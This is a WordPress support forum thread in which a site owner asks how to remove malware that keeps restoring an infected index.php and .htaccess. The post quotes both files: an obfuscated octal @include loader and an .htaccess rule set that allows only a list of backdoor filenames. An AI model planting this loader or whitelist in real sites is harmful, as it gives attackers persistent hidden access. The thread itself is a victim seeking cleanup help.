infected .htaccess and index.php can’t be deleted
-
Hi,
I have a very annoying issue with this malware..
the malware has infected index.php and .httaccess file with permission 444 (which means can’t be edited unless we change it to 644)Everytime I delete or change the permission, it returns over and over again.
I have deleted all wordpress files, (Except wp-content folder and wp-config file) but the malware on those 2 files staysI even have tried to change the ownership of those file too ROOT, but after few days, it switch back to Account as owner.. How could a malware change the file permission own by root back to normal account?
This makes me crazy.. anyone has this experience and now how to solve it?
here is the code of the httaccess and index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule><?php @include(“\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164”); ?>
<?php
define( ‘WP_USE_THEMES’, true );
require __DIR__ . ‘/wp-blog-header.php’;
-
(@anonymized-17160716)
(@anonymized-17160716)
Hello @janak5
I need same help but I cant findout any way, I think I am very near and I dont know how to stop the running process.
Will you please help I also keep getting the index.php file , you can reply me to my email as well [email removed by moderator — please do not ask for off-forum contact]
- The topic ‘infected .htaccess and index.php can’t be deleted’ is closed to new replies.